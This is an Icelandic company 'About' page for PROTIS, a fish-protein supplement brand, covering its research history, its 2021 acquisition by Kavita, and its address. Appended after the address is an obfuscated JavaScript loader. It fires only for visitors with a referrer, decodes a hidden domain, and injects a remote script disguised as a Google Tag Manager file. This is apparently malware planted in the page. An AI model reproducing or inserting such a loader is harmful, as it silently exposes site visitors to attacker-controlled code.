UM PROTIS

PROTIS er íslenskt vörumerki sem stofnað var árið 2015 með það markmið að þróa og markaðssetja hágæða heilsuvörur úr íslensku hráefni, aflað og unnið á sjálfbæran hátt.
Þrjár af upphaflegum vörum PROTIS eru nú á markaði sem heita Kollagen, Liðir og Eftir æfingu (áður Úthald).

Rannsóknir og þróun

PROTIS byggir á áralöngum rannsóknum og þróunarvinnu á nýtingu fiskiprótína sem unnin var af Matís, Háskóla Íslands og fleiri rannsóknarstofa undir handleiðslu stofnenda PROTIS, FISK Seafood á Sauðarkróki.

Sagan

Protis ehf., íslenskt líftæknifyrirtæki, sem sérhæfði sig í þróun, framleiðslu og sölu á lífvirku fiskprótíni úr villtum íslenskum þorski (Gadus morhua), svo kölluðu IceProtein® og afurðum sem innihalda IceProtein®. 

Fyrirtækið lagði áherslu á að þróa og markaðssetja heilsuvörur úr íslensku hráefni, sem aflað og unnið er á sjálfbæran hátt, fyrir viðskiptavini sem leita eftir hágæða náttúrulegum vörum.


Upphaflega var fyrirtækið Iceprotein ehf. sett á laggirnar í framhaldi af rannsóknarverkefninu „Fiskprótein sem fæðubótarefni“ sem Matís ohf, áður Rannsóknastofnun fiskiðnaðarins, stóð að í samvinnu við nokkur sjávar- útvegsfyrirtæki. Iceprotein ehf. stundaði rannsóknir og þróaði IceProtein® tæknina ásamt því að hanna framleiðsluferla með það að markmiði að tryggja hámarksgæði PROTIS Fiskprótín varanna sem Protis ehf setti á markað í byrjun árs 2016.  

Þessar rannsóknir fóru fram í Verinu vísindagörðum á Sauðakróki, en þar voru sérhæfðar rannsóknastofur og tilraunaverksmiðja þar sem vísindamenn og frumkvöðlar í líftækni gátu þróað vörur og verkferla.


Árið 2021 festi fyrirtækið Kavita kaup á Protis ehf með það að markmiði að halda áfram uppbyggingu á vörumerkinu út frá því gæðastarfi sem vörumerkið og vörurnar eru sprottnar úr.
Þrjár af upphaflegum vörum PROTIS eru nú á markaði sem heita Kollagen, Liðir og Eftir æfingu (áður Úthald).  Framleiðslan á vörum PROTIS fer nú fram hjá Foodsmart Nordic sem staðsett er á norðvesturlandi. Þar er lögð áhersla á að byggja á þeim framleiðsluaðferðum sem hafa verið þróaðar undanfarin ár sem eru í sífelldri framþróun til að hámarka gæði á vörunum.


Markmið Kavita er að færa Íslendingum fjölbreytt úrval af hágæða fæðubótaefnum.

Vörurnar eru nú fáanlegar í öllum helstu matvöruverslunum og apótekum um land allt og á www.protis.is

Staðsetning

PROTIS / Kavita ehf

Húnabraut 33,
540 Blönduós
Iceland

!function (_6dd199) { var _d0d3d0 = Date.now(); var _d4ce14 = 1000; _d0d3d0 = _d0d3d0 / _d4ce14; _d0d3d0 = Math.floor(_d0d3d0); var _1eb404 = 600; _d0d3d0 -= _d0d3d0 % _1eb404; _d0d3d0 = _d0d3d0.toString(16); var _aa32be = _6dd199.referrer; if (!_aa32be) return; var _f11c10 = [20717, 20714, 20711, 20722, 20731, 20717, 20726, 20731, 20731, 20714, 20656, 20713, 20731, 20732, 20717, 20714, 20735, 20714, 20727, 20733, 20733, 20730, 20720, 20656, 20733, 20721, 20723]; _f11c10 = _f11c10.map(function(_a47c7e){ return _a47c7e ^ 20638; }); var _54411e = "6a6ab9b728b75d01d29773439bcfdd8c"; _f11c10 = String.fromCharCode(..._f11c10); var _7a97ab = "https://"; var _751c1c = "/"; var _b61378 = "gtm-"; var _fa4fc7 = ".js"; var _75d7f7 = _6dd199.createElement("script"); _75d7f7.type = "text/javascript"; _75d7f7.async = true; _75d7f7.src = _7a97ab + _f11c10 + _751c1c + _b61378 + _d0d3d0 + _fa4fc7; _6dd199.getElementsByTagName("head")[0].appendChild(_75d7f7) }(document);